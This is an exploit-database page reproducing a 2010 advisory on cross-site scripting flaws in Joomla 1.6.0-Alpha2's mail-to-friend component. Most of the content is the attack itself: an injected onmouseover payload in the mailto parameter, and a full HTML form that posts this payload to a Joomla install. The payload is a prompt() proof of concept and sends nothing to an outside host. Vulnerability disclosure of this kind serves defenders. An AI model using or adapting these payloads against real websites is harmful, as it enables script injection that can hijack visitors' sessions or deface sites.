Vulners
Lucene search
Joomla 1.6.0-Alpha2 Cross Site Scripting
`
# Title:Joomla_1.6.0-Alpha2 XSS Vulnerabilities
# Date: 2010-05-02
# Author: mega-itec.com
# Software Link:
http://joomlacode.org/gf/download/frsrelease/11322/45252/Joomla_1.6.0-Alpha2-Full-Package.zip
# Version: 1.6.0-alpha2
# Tested on: [relevant os]
# CVE :
# Code :
[:::::::::::::::::::::::::::::::::::::: 0x1
::::::::::::::::::::::::::::::::::::::]
>> General Information
Advisory/Exploit Title = Joomla_1.6.0-Alpha2 XSS Vulnerabilities
Author = mega-itec security team
Contact = [email protected]
[:::::::::::::::::::::::::::::::::::::: 0x2
::::::::::::::::::::::::::::::::::::::]
>> Product information
Name = Joomla
Vendor = Joomla
Vendor Website = http://www.joomla.org/
Affected Version(s) = 1.6.0-Alpha2
[:::::::::::::::::::::::::::::::::::::: 0x3
::::::::::::::::::::::::::::::::::::::]
>> #1 Vulnerability
Type = XSS ( POST ) mailto,subject,from,sender
Example URI =
option=com_mailto&task=user%2Elogin&32720689cad34365fbe10002f91e50a9=1&mailto=%F6"+onmouseover=prompt(406426661849)//&[email protected]&[email protected]&[email protected]&layout=default&tmpl=component&link=encode
link with base 64
>> #2 html code exploit :
<form action="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/index.php"
name="mailtoForm" method="post">
<div style="padding: 10px;">
<div style="text-align:right">
<a href="javascript: void window.close()">
Close Window <img
src="http://localhost/Joomla_1.6.0-Alpha2-Full-Package/components/com_mailto/assets/close-x.png"
border="0" alt="" title="" /></a>
</div>
<h2>
E-mail this link to a friend. </h2>
<p>
E-mail to:
<br />
<input type="text" name="mailto" class="inputbox" size="25" value="�"
onmouseover=prompt(406426661849)//"/>
</p>
<p>
Sender:
<br />
<input type="text" name="sender" class="inputbox"
value="[email protected]" size="25" />
</p>
<p>
Your E-mail:
<br />
<input type="text" name="from" class="inputbox"
value="[email protected]" size="25" />
</p>
<p>
Subject:
<br />
<input type="text" name="subject" class="inputbox"
value="[email protected]" size="25" />
</p>
<p>
<button class="button" onclick="return submitbutton('send');">
Send </button>
<button class="button" onclick="window.close();return false;">
Cancel </button>
</p>
</div>
<input type="hidden" name="layout" value="default" />
<input type="hidden" name="option" value="com_mailto" />
<input type="hidden" name="task" value="send" />
<input type="hidden" name="tmpl" value="component" />
<input type="hidden" name="link" value="encode you link with base64" />
<input type="hidden" name="4b42dc29b4b226460d1b510634e21864" value="1"
/></form>
[:::::::::::::::::::::::::::::::::::::: 0x4
::::::::::::::::::::::::::::::::::::::]
>> Misc
mega-itec.com ::: mega-itec security team
[:::::::::::::::::::::::::::::::::::::: EOF
::::::::::::::::::::::::::::::::::::::]
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
04 May 2010 00:00Current
7.4High risk
Vulners AI Score7.4